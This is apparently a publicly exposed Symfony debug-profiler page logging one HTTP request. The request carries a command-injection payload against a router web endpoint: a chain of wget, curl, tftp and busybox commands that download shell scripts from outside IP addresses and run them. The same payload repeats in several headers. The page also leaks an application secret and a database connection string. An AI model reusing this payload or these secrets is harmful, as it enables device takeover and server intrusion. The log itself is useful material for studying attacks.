n/a
Request
GET Parameters
Key | Value |
---|---|
country | "$(id>`wget http://193.111.248.148:5001; curl http://193.111.248.148:5001; wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && chmod +x /tmp/dvr.sh && /tmp/dvr.sh; curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; tftp 103.161.34.97 -c get tftp1.sh && chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; tftp -r tftp2.sh -g 103.161.34.97 && chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh; /bin/busybox wget -g 103.161.34.97 -l /tmp/.oxy -r /bins/; /bin/busybox wget http://103.161.34.97/dvr.sh -O /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox wget http://103.161.34.97/ftp1.sh -O /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox curl http://103.161.34.97/dvr.sh -o /tmp/dvr.sh && /bin/busybox chmod +x /tmp/dvr.sh && /tmp/dvr.sh; /bin/busybox curl http://103.161.34.97/ftp1.sh -o /tmp/ftp1.sh && /bin/busybox chmod +x /tmp/ftp1.sh && /tmp/ftp1.sh; /bin/busybox tftp 103.161.34.97 -c get tftp1.sh && /bin/busybox chmod +x /tmp/tftp1.sh && /tmp/tftp1.sh; /bin/busybox tftp -r tftp2.sh -g 103.161.34.97 && /bin/busybox chmod +x /tmp/tftp2.sh && /tmp/tftp2.sh`)" |
form | "country" |
operation | "write" |
POST Parameters
No POST parameters
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_stopwatch_token | "5ebe16" |
Request Headers
Header | Value |
---|---|
accept-encoding | "gzip" |
host | "52.71.234.132" |
user-agent | "Go-http-client/1.1" |
x-php-ob-level | "1" |
Request Content
Request content not available (it was retrieved as a resource).
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=utf-8" |
date | "Fri, 20 Sep 2024 22:40:15 GMT" |
location | "http://www.52.71.234.132/cgi-bin/luci/;stok=/locale?country=%24%28id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60%29&form=country&operation=write" |
x-debug-token | "cf4f4d" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_SECRET | "0468dc9487509ad162025c82176e60a9" |
CORS_ALLOW_ORIGIN | "^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$" |
DATABASE_URL | "postgresql://app:!ChangeMe!@127.0.0.1:5432/db_name?serverVersion=16&charset=utf8" |
EWZ_RECAPTCHA_SECRET | "" |
EWZ_RECAPTCHA_SITE_KEY | "" |
GOOGLE_RECAPTCHA_SECRET | "" |
GOOGLE_RECAPTCHA_SITE_KEY | "" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
APP_ENV | "test" |
CONTENT_LENGTH | "" |
CONTENT_TYPE | "" |
DOCUMENT_ROOT | "/var/www/campussuite/public" |
DOCUMENT_URI | "/index.php" |
FCGI_ROLE | "RESPONDER" |
GATEWAY_INTERFACE | "CGI/1.1" |
HOME | "/usr/share/httpd" |
HTTP_ACCEPT_ENCODING | "gzip" |
HTTP_HOST | "52.71.234.132" |
HTTP_USER_AGENT | "Go-http-client/1.1" |
PATH | "/usr/local/nvm/versions/node/v4.2.6/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)" |
REDIRECT_STATUS | "200" |
REMOTE_ADDR | "85.90.246.83" |
REMOTE_PORT | "37848" |
REQUEST_METHOD | "GET" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1726872014 |
REQUEST_TIME_FLOAT | 1726872014.9428 |
REQUEST_URI | "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget%20http%3A%2F%2F193.111.248.148%3A5001%3B%20curl%20http%3A%2F%2F193.111.248.148%3A5001%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%3B%20%2Fbin%2Fbusybox%20wget%20-g%20103.161.34.97%20-l%20%2Ftmp%2F.oxy%20-r%20%2Fbins%2F%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-O%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-O%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fdvr.sh%20-o%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fdvr.sh%20%26%26%20%2Ftmp%2Fdvr.sh%3B%20%2Fbin%2Fbusybox%20curl%20http%3A%2F%2F103.161.34.97%2Fftp1.sh%20-o%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Fftp1.sh%20%26%26%20%2Ftmp%2Fftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20103.161.34.97%20-c%20get%20tftp1.sh%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp1.sh%20%26%26%20%2Ftmp%2Ftftp1.sh%3B%20%2Fbin%2Fbusybox%20tftp%20-r%20tftp2.sh%20-g%20103.161.34.97%20%26%26%20%2Fbin%2Fbusybox%20chmod%20%2Bx%20%2Ftmp%2Ftftp2.sh%20%26%26%20%2Ftmp%2Ftftp2.sh%60)" |
SCRIPT_FILENAME | "/var/www/campussuite/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "10.1.43.214" |
SERVER_NAME | "_" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SOFTWARE | "nginx/1.22.1" |
SYMFONY_DOTENV_VARS | "DATABASE_URL,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,EWZ_RECAPTCHA_SITE_KEY,EWZ_RECAPTCHA_SECRET,CORS_ALLOW_ORIGIN,APP_SECRET" |
USER | "apache" |